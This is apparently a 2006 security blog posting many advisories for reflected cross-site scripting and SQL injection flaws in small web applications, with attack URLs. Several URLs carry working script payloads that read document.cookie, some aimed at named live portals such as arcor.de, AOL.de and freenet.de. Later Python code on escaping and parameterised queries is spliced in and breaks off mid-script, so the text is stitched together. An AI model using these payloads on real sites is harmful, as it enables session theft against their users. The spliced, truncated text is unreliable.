by r0t, der4444, cembo, VietMafia

Friday, March 31, 2006

SiteSearch Indexer 3.5 XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 31 March 2006
Vendor: www.marcreed.com/projects/search_indexer/tutorial/
Affected versions: 3.5 and prior
###############################################

Vuln. description:

SiteSearch Indexer contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "searchField" parameter in "searchresults.asp" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

/search/searchresults.asp?searchField=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
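What "isn't properly sanitised before being returned to the user" looks like in code, and what the "edit the source code" fix amounts to, as an added Python example that is not code from SiteSearch Indexer or from any other product on this page. The same pattern covers every reflected XSS entry below: the URL-encoded %22%3Cscript%3E... payloads in the arcor.de list, the free-text search fields, and the numeric parameters such as "start_day" or "sharedPlanID=1[XSS]", so the example is written for an arbitrary parameter name rather than only "searchField". The handler names, the page template and the query strings are constructed for illustration:

```python
"""Reflected XSS: the vulnerable echo, two fixes, and a reflection check.

Added example, not code from SiteSearch Indexer or any product on this page.
The page template, the function names and the sample URLs are constructed.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed template; the parameter lands inside an attribute, so a leading
# double quote (%22 in the advisories' URLs) closes the attribute early.
TEMPLATE = '<html><body><p>Results for: <input value="%s"></p></body></html>'


def _first_value(query_string: str, name: str) -> str:
    """Decode the query the way the server does (percent-encoding removed)."""
    params = parse_qs(query_string, keep_blank_values=True)
    return params.get(name, [""])[0]


def vulnerable_results_page(query_string: str, name: str = "searchField") -> str:
    """Flawed pattern: the decoded parameter is placed into the HTML verbatim."""
    return TEMPLATE % _first_value(query_string, name)


def hardened_results_page(query_string: str, name: str = "searchField") -> str:
    """Fix for free-text fields: escape & < > " ' for the HTML attribute context."""
    return TEMPLATE % html.escape(_first_value(query_string, name), quote=True)


def parse_numeric_id(raw: str, minimum: int = 1) -> int:
    """Fix for parameters that are really integers (start_day, calendar_id,
    plan_id ...): allow-list the shape and reject anything else outright,
    instead of encoding a value that should never contain markup."""
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError("not a numeric id: %r" % raw)
    value = int(raw)
    if value < minimum:
        raise ValueError("id out of range: %d" % value)
    return value


def reflects_unescaped(url: str, render) -> bool:
    """Check to run against a fix: does any markup-bearing query value come
    back verbatim in the response body?

    url:    the crafted URL (absolute or path-only, payload percent-encoded or not)
    render: function mapping the raw query string to the response HTML
    The comparison uses the decoded value, which is what the browser would parse.
    """
    query = urlsplit(url).query
    body = render(query)
    values = [v for vs in parse_qs(query, keep_blank_values=True).values() for v in vs]
    return any(any(c in v for c in '<>"\'') and v in body for v in values)


if __name__ == "__main__":
    crafted = "/search/searchresults.asp?searchField=%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E"
    print("vulnerable reflects payload:", reflects_unescaped(crafted, vulnerable_results_page))
    print("hardened reflects payload:  ", reflects_unescaped(crafted, hardened_results_page))
```

reflects_unescaped is deliberately blind to how the payload was encoded on the wire: parse_qs decodes it, so a %22%3Cscript%3E payload and a literal one are judged the same way. html.escape with quote=True is the minimal fix where the value is legitimately free text; for the many integer parameters in these advisories, rejecting non-digits (parse_numeric_id) is the stronger choice, since the payload then never reaches the template at all.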

Keystone DLS SQL vuln.

###############################################
Vuln. discovered by: r0t
Date: 31 March 2006
Vendor: http://www.indexdata.dk/keystone/
Affected versions: 1.5.4 and prior
###############################################

Vuln. description:

Keystone Digital Library Suite contains a flaw that allows remote SQL injection attacks. Input passed to the "subject_type_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/?subject_type_id=[SQL]
/search/?number=10&search_type=&subject_type_id=[SQL]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Mantis XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 31 March 2006
Vendor: http://www.mantisbt.org/
Affected versions: Mantis 1.0.1 and 1.0.0rc5 and prior
###############################################

Vuln. Description:

Mantis contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "start_day", "start_year" and "start_month" parameters in "view_all_set.php" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/view_all_set.php?type=1&temporary=y&do_filter_by_date=on&start_year=2006&start_month=03&start_day=[XSS]

/view_all_set.php?type=1&temporary=y&do_filter_by_date=on&start_year=[XSS]

/view_all_set.php?type=1&temporary=y&do_filter_by_date=on&start_year=2006&start_month=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, March 29, 2006

arcor.de multiple XSS vuln.

Here are a few examples; the portal contains more than 100 XSS vulns., so I don't post all of them here.

https://www.arcor.de/netpass/home.jsp?username=%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&password=r0t&login.x=40&login.y=11

https://www.arcor.de/netpass/home.jsp?username=r0t&password=%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&login.x=40&login.y=11


https://www.arcor.de/netpass/einrichten.jsp?username=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&password=r0t&password2=r0t&speichern.x=55&speichern.y=11


https://www.arcor.de/netpass/einrichten.jsp?username=r0t&password=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&password2=r0t&speichern.x=55&speichern.y=11

https://www.arcor.de/netpass/einrichten.jsp?username=r0t&password=r0t&password2=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&speichern.x=55&speichern.y=11



http://www.arcor.de/content/srearchresult.jsp?Keywords=Auto&teaser=1&scategorytype=web&searchID1=&searchID2=&naviID=%22%3Cscript%3Ealert('r0t')%3C/script%3E


http://www.arcor.de/content/srearchresult.jsp?Keywords=Auto&teaser=1&scategorytype=web&searchID1=&searchID2=%22%3Cscript%3Ealert('r0t')%3C/script%3E


http://www.arcor.de/content/srearchresult.jsp?Keywords=Auto&teaser=1&scategorytype=web&searchID1=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/login/login.jsp?goto=/tp/chatuser/?channel=%22%3Cscript%3Ealert('r0t')%3C/script%3E


http://www.arcor.de/login/login.jsp?goto=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=/gaming/highscore.jsp%3Fplay=go%26gameID=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=/gaming/highscore.jsp%3Fplay=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/tophopp/topflop.jsp?typ=%22%3Cscript%3Ealert('r0t')%3C/script%3E


If Arcor's developers or project owners are reading this report and want the full list of vulns., you can contact me via th3cracker at gmail.com

GMX mail XSS

Today's full report wasn't enough, so I spent 30 seconds more on gmx.de.

To see the vuln., you must manually enter an XSS payload in any of the fields below.

http://www101.gmx.net/de/cgi/pwprint

Ihre alternative E-Mail-Adresse (your alternative e-mail address): XSS

Ihre Handy-Nummer (your mobile number): XSS

betandwin.de XSS

To see an example, manually enter any of the previous XSS payloads in the "Wetten suchen:" (search bets) field.

XSS in AOL.de

Here is another e-mail service which isn't secure.


http://www.aol.de/unternehmen/presse/meldung_detail.jsp?cid=&backlink=%22%3Cscript%3Ealert('r0t')%3C/script%3E

freenet.de XSS

A lot of Germans use this mail service.

http://office.freenet.de/dienste/emailoffice/service/serv_generic_msg/index.html?msg=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Tuesday, March 28, 2006

phpCOIN v1.2.2 XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 28 March 2006
Vendor: http://www.phpcoin.com/
Affected versions: v1.2.2 and prior
###############################################

Vuln. Description:

phpCOIN contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "fs" parameter in "mod.php" and "mod_print.php" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:


/mod_print.php?mod=helpdesk&sb=&so=&fb=&fs=[XSS]
/mod.php?mod=orders&mode=view&sb=1&so=A&fb=&fs=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

classifiedZONE v1.2 XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 28 March 2006
Vendor: http://www.fusionzone.com/applications/classifieds/
Affected versions: v1.2 and prior
###############################################

Vuln. Description:

classifiedZONE contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "rtn" parameter in "accountlogon.cfm" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

/accountlogon.cfm?rtn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

realestateZONE 4.2 Multiple XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 28 March 2006
Vendor: http://www.fusionzone.com/applications/realestate/
Affected versions: v4.2 and prior
###############################################


Vuln. Description:


realestateZONE contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "bamin", "bemin", "pmin" and "state" parameters in "index.cfm" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/index.cfm?pg=278&redir=listings&ui=&bamin=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?pg=278&redir=listings&ui=&bamin=0&bemin=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?pg=278&redir=listings&ui=&bamin=0&bemin=0&pmin=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?pg=278&redir=listings&ui=&bamin=0&bemin=0&pmin=0&pmax=99999999&zc=&city=&state=%22%3Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

couponZONE v.4.2 Multiple vuln.

###############################################
Vuln. discovered by: r0t
Date: 28 March 2006
Vendor: http://www.fusionzone.com/applications/coupons
Affected versions: v4.2 and prior
###############################################


Vuln. Description:
1.
couponZONE contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the local.cfm script not properly sanitizing user-supplied input to the 'companyid', 'scat' or 'coid' variables. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Additionally, if a query fails, the program discloses the software's installation path in the error output. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.

examples:

/local.cfm?redir=listings&srchby=&companyid=[SQL]
/local.cfm?redir=listings&srchby=ct&cat=&scat=[SQL]
/local.cfm?redir=adv_details&coid=[SQL]


2.
couponZONE contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "srchfor" and "srchby" parameters in "local.cfm" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/local.cfm?srchfor=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&cat=0&x=95&y=13&RequestTimeOut=500&redir=listings&srchby=fr&scat=0

/local.cfm?srchfor=&cat=0&x=78&y=22&RequestTimeOut=500&redir=listings&srchby=%22%3Cscript%3Ealert('r0t')%3C/script%3E



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ActiveCampaign SupportTrio 2.5 vuln.

###############################################
Vuln. discovered by: r0t
Date: 28 March 2006
Vendor: http://www.activecampaign.com/
Affected versions: 2.50.2
###############################################


Vuln. description:

ActiveCampaign SupportTrio contains a flaw that allows a remote cross-site scripting attack. The flaw exists because
input passed to the KnowledgeBase search module field parameters when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.



+


Additionally, a manually crafted request that triggers a fatal error discloses the
full installation path:

/supporttrio/index.php?action=kb&article=[r0t]
/supporttrio/index.php?action=kb&print=[r0t]
/supporttrio/modules/KB/pdf.php?category=[r0t]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, March 27, 2006

CONTROLzx HMS - Hosting Management System vuln.

###############################################
Vuln. discovered by: r0t
Date: 27 March 2006
Vendor: http://front.controlzx.com/
Affected versions: v3.3.4 and prior
###############################################

Vuln. description:


CONTROLzx HMS contains flaws that allow remote cross-site scripting attacks.
The flaws exist because input passed to the "dedicatedPlanID" parameter in "dedicated_order.php", the "sharedPlanID" parameter in "shared_order.php" and the "plan_id" parameter in "/customers/server_management.php" isn't properly sanitised before being returned to the user.
Input passed to the email field in "/customers/forgotpass.php" isn't properly sanitised before being returned to the user either.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/shared_order.php?sharedPlanID=1[XSS]
/dedicated_order.php?dedicatedPlanID=1[XSS]
/customers/server_management.php?plan_id=1[XSS]


+

/small update/

A few months ago this software was sold under another name, "DRZES HMS", and I reported multiple vulns. in DRZES HMS 3.2 (see the additional info below).
As an update, here is one from version 3.2 which isn't fixed in the latest releases:

Input passed to the search field in "/customers/register_domain.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.


###############################################
DRZES HMS 3.2 - multiple SQL inj. and XSS vuln.
http://pridels.blogspot.com/2005/11/drzes-hms-32-multiple-vuln.html
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Connect Daily Web Calendar Software Multiple XSS vuln.


###############################################
Vuln. discovered by: r0t
Date: 27 March 2006
Vendor: http://www.mhsoftware.com/connectdaily.htm
Affected versions: 3.2.9 and prior
###############################################

Vuln. description:

Connect Daily Web Calendar Software contains a flaw that allows a remote cross-site scripting attack.
The flaw exists because input passed to:
a.) the "calendar_id", "style_sheet" and "start" parameters in "ViewDay.html",
b.) the "txtSearch", "opgSearch" and "opgFields" parameters in "ViewSearch.html",
c.) the "calendar_id" and "approved" parameters in "ViewYear.html",
d.) the "item_type_id" parameter in "ViewCal.html",
e.) the "week" parameter in "ViewWeek.html",
isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/ViewDay.html?start=2453810&&integral=0&style_sheet=userStyle.css&dropdown=1&show_stop=0&show_resources=0&calendar_id=[XSS]

/ViewDay.html?start=2453810&&integral=0&style_sheet=[XSS]

/ViewDay.html?start=[XSS]

/ViewCal.html?item_type_id=[XSS]

/ViewSearch.html?integral=0&show_stop=0&show_resources=0&criteria=calendar_id%3D34&txtSearch=[XSS]

/ViewSearch.html?integral=0&show_stop=0&show_resources=0&criteria=calendar_id%3D34&txtSearch=&opgFields=1&opgSearch=[XSS]

/ViewSearch.html?integral=0&show_stop=0&show_resources=0&criteria=calendar_id%3D34&txtSearch=&opgFields=[XSS]

/ViewYear.html?n=1&dropdown=1&integral=0&approved=1&show_stop=0&show_resources=0&calendar_id=[XSS]

/ViewYear.html?n=1&dropdown=1&integral=0&approved=[XSS]

/ViewWeek.html?year=2006&week=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

It's great to be back.

After a three-month vacation I'm back, so I will focus more on our board, because there are too many fields which are empty...



btw...

e-secure-it.nl

http://www.e-secure-it.nl/alert.asp?alertid=[XSS]

The search engine also has the same problem.

Helm Web Hosting Control Panel XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 27 March 2006
Vendor: http://www.webhostautomation.com/
Affected versions: 3.2.10 and prior
###############################################

Vuln. description:

Helm Web Hosting Control Panel contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "txtDomainName" parameter in "domains.asp", and, in the Helm online help, input passed to the "SearchText" and "UserLevel" parameters in "default.asp", isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


/interfaces/standard/domains.asp?txtDomainName=[XSS]
/helmonlinehelp/default.asp?categoryID=24&UserLevel=2&SearchText=[XSS]
/helmonlinehelp/default.asp?categoryID=24&UserLevel=[XSS]

Successful exploitation is possible with any access level (user/reseller/admin).

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Metisware Instructor XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 27 March 2006
Vendor: http://www.metisware.com/
Affected versions: 1.3 and prior
###############################################

Vuln. description:

Instructor contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the Task field parameter in "/MyTasks/PersonalTaskEdit.asp" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Web Quiz pro XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 27 March 2006
Vendor: www.calorisplanitia.com/online-quiz-system.aspx
Affected versions: Pro
###############################################

Vuln. description:

Web Quiz Pro contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "exam" parameter in "prequiz.asp" and the "msg" parameter in "student.asp" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


/prequiz.asp?examid=1&exam=[XSS]
/student.asp?msg=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

E-School Management System XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 27 March 2006
Vendor: www.calorisplanitia.com/e-school-management-system.aspx
Affected versions: 1.0 and prior
###############################################

Vuln. description:

E-School Management System contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "msg" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


/default.asp?msg=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

EZHomepagePro multiple XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 27 March 2006
Vendor: www.htmljunction.net/ezhomepagepro/index.asp
Affected versions: v1.5 and prior
###############################################


Vuln. description:

EZHomepagePro contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "adid" and "aname" parameters in "/common/email.asp", "/users/users_search.asp" and "/users/users_profiles.asp", the "m" parameter in "/users/users_search.asp", the "page" parameter in "/users/users_calendar.asp" and the "usid" parameter in "/users/users_mgallery.asp" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/common/email.asp?page=user&m=y&select=r0t-&usid=2&uname=guest&aname=&adid=[XSS]

/common/email.asp?page=user&m=y&select=r0t-&usid=2&uname=&aname=[XSS]

/users/users_search.asp?page=user&uname=r0t&usid=2&aname=&adid=&m=[XSS]

/users/users_search.asp?page=user&uname=r0t&usid=2&aname=&adid=[XSS]

/users/users_search.asp?page=user&uname=r0t&usid=2&aname=[XSS]

/users/users_calendar.asp?view=yes&action=write&uname=r0t&usid=2&date=3/2/2006&sdate=3/2/2006&page=[XSS]

/users/users_profiles.asp?page=user&uname=r0t&usid=2&aname=&adid=[XSS]

/users/users_profiles.asp?page=user&uname=r0t&usid=2&aname=[XSS]

/users/users_mgallery.asp?gn=r0t&gp=guest&fl=Favorites&usid=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

WebAPP multiple XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 27 March 2006
Vendor: http://www.web-app.org/
Affected versions: 0.9.9.3.2 and prior
###############################################

Vuln. description:


WebAPP contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "action", "id", "num", "board", "cat", "real", "viewcat", "img" and "curcatname" parameters in "index.cgi" and the "vsSD" parameter in "/mods/calendar/index.cgi" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



examples:

http://victim/cgi-bin/index.cgi?action=[XSS]

http://victim/cgi-bin/index.cgi?action=&id=[XSS]

http://victim/cgi-bin/index.cgi?action=forum&board=chitchat&op=&num=[XSS]

http://victim/cgi-bin/index.cgi?action=&board=[XSS]

http://victim/cgi-bin/index.cgi?action=&cat=[XSS]

http://victim/cgi-bin/index.cgi?action=otherarticles&writer=&real=[XSS]

http://victim/cgi-bin/index.cgi?action=&viewcat=[XSS]

http://victim/cgi-bin/index.cgi?action=printtopic&id=1&curcatname=&img=[XSS]

http://victim/cgi-bin/index.cgi?action=printtopic&id=1&curcatname=[XSS]

http://victim/cgi-bin/mods/calendar/index.cgi?vsSD=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

BlankOL XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 27 March 2006
Vendor: http://www.blankol.com/
Affected versions: 1 and prior
###############################################

Vuln. description:

BlankOL contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "file" and "function" parameters in "bol.cgi" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/bol.cgi?file=[XSS]
/bol.cgi?function=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, March 25, 2006

Absolute Image Gallery XE 2.0 XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 25 March 2006
Vendor: http://www.xigla.com/absoluteig/index.htm
Affected versions: v2.0 and prior
###############################################

Vuln. Description:

Absolute Image Gallery XE contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "shownew" parameter in "gallery.asp" and to the parameters of the search module isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


one example provided:

/gallery.asp?action=viewimage&categoryid=8&text=&imageid=43&box=&shownew=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Absolute Live Support XE V2.0 XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 25 March 2006
Vendor: http://www.xigla.com/absolutels/index.htm
Affected versions: v2.0 and prior
###############################################

Vuln. Description:

Absolute Live Support XE contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "Screen name" and "Session Topic" field parameters on the register page isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Absolute FAQ Manager .NET XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 25 March 2006
Vendor: http://www.xigla.com/absolutefmnet/
Affected versions: 4.0 and prior
###############################################

Vuln. Description:

Absolute FAQ Manager .NET contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the search module parameters isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

uniForum XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 25 March 2006
Vendor: http://uniforum.biz/
Affected versions: uniForum 4 and prior
###############################################

Vuln. Description:

uniForum contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the username and email field parameters in "wbadmlog.aspx" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

XSS vuln. in dotNetBB <= v2.4

###############################################
Vuln. discovered by: r0t
Date: 25 March 2006
Vendor: http://www.dotnetbb.com/
Affected versions: 2.42EC SP 3 and prior
###############################################

Vuln. Description:

dotNetBB contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the email field "em" parameter in "iforget.aspx" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SweetSuite.NET - ssCMS 2.1.x XSS vuln.

###############################################
Vuln. discovered by: r0t
Date: 25 March 2006
Vendor: www.sweetsuite.net/ssCMSMain.aspx
Affected versions: 2.1.0 and prior
###############################################

Vuln. Description:

ssCMS contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "keywords" parameter in "search.aspx" isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary HTML and script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

XSS in <= Toast Forums 1.6

###############################################
Vuln. discovered by : r0t
Date: 25 march 2006
vendor:http://www.toastforums.com/
affected versions: 1.6 and prior
###############################################

Vuln. Description.

Toast Forums contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "author","subject","message","dayprune" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/toast.asp?action=posts&sub=search&fid=-1&author=[XSS]

/toast.asp?action=posts&sub=search&fid=-1&author=r0t&subject=[XSS]

/toast.asp?action=posts&sub=search&fid=-1&author=r0t&subject=&message=[XSS]

/toast.asp?action=posts&sub=search&fid=-1&author=r0t&subject=&message=&dayprune=[XSS]
###############################################

Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ www.unsecured-systems.com/forum/
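The reflected-output pattern behind this and the other XSS advisories on this page, as an added example that is not Toast Forums' code (the form markup and function names are constructed): the four search fields echoed back unencoded, beside the output encoding the Solution line calls for.

```python
import html

# The four reflected search fields named in the advisory.
FIELDS = ("author", "subject", "message", "dayprune")

def render_search(params, encode):
    """Build the search form plus an echo line for each field, passing every
    client-supplied value through `encode` before it reaches the HTML."""
    parts = []
    for name in FIELDS:
        value = encode(params.get(name, ""))
        # The value lands in two contexts: a quoted attribute and element text.
        parts.append('<label>%s: <input name="%s" value="%s"></label>' % (name, name, value))
        parts.append("<p>Searched %s for: %s</p>" % (name, value))
    return "\n".join(parts)

def render_vulnerable(params):
    # Vulnerable pattern: values are echoed unchanged, so a double quote closes the
    # attribute and a '<' starts markup of the client's choosing.
    return render_search(params, lambda value: value)

def render_hardened(params):
    # Hardened: HTML-encode at the point of output. quote=True also encodes " and ',
    # which is what keeps the value inside the attribute. This covers HTML text and
    # quoted-attribute contexts only; a value written into a script block or a URL
    # would need that context's own encoding.
    return render_search(params, lambda value: html.escape(value, quote=True))
```

The fix lives at the point of output, not at input: the same value is still echoed, it just can no longer change the page's structure.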

Thursday, March 23, 2006

AdMan v1.0.x SQL vuln

##########################################
Vuln. discovered by : r0t
Date: 23 march 2006
vendor:www.formfields.com/adManArea/
affected versions: v1.0.20051221 and prior
#########################################
SQL vuln.

AdMan contains a flaw that allows remote SQL injection attacks. Input passed to the "transactions_offset" parameter in "advertiser/viewStatement.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:

/adMan/advertiser/viewStatement.php?start_date_date_month=03&start_date_date_day=01&start_date_date_year=2008&start_date_time_hour=12&start_date_time_min=00&start_date_time_amPm=AM&end_date_date_month=&end_date_date_day=&end_date_date_year=&end_date_time_hour=&end_date_time_min=&end_date_time_amPm=&_submit=&transactions_offset=[SQL]

#########################################

Additionally, to get the full installation path:

/adMan/advertiser/editCampaign.php?campaignId=
/adMan/advertiser/viewPricingScheme.php?schemeId=

#########################################

Solution:

Edit the source code to ensure that input is properly sanitised.

########################################

You can discuss this vuln. @ unsecured-systems.com/forum
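The injection pattern behind this and the other SQL advisories on this page, as an added example that is not AdMan's code (the table, values and function names are constructed): a numeric offset taken from the query string and pasted into the SQL text, beside the fix the Solution line asks for, strict integer validation plus bound parameters.

```python
import re
import sqlite3

# Constructed in-memory stand-in for an advertiser statement table (not AdMan's real schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
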